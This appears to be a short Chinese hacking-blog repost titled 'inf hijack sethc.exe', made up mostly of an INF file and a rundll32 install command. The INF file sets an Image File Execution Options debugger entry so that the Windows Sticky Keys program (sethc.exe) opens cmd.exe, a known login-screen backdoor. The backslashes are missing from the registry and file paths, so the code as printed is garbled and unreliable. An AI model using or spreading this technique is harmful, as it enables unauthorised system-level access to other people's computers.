inf劫持sethc.exe

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution optionssethc.exe,debugger,0×00000000,c:windowssystem32cmd.exe
Command:
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:windowstempname.inf

转载请注明: 本文转载自中国蓝客联盟官方团队博客
本文链接地址: inf劫持sethc.exe

发表评论

电子邮件地址不会被公开。 必填项已用*标注

人类验证码: 如果无法查看图片请刷页面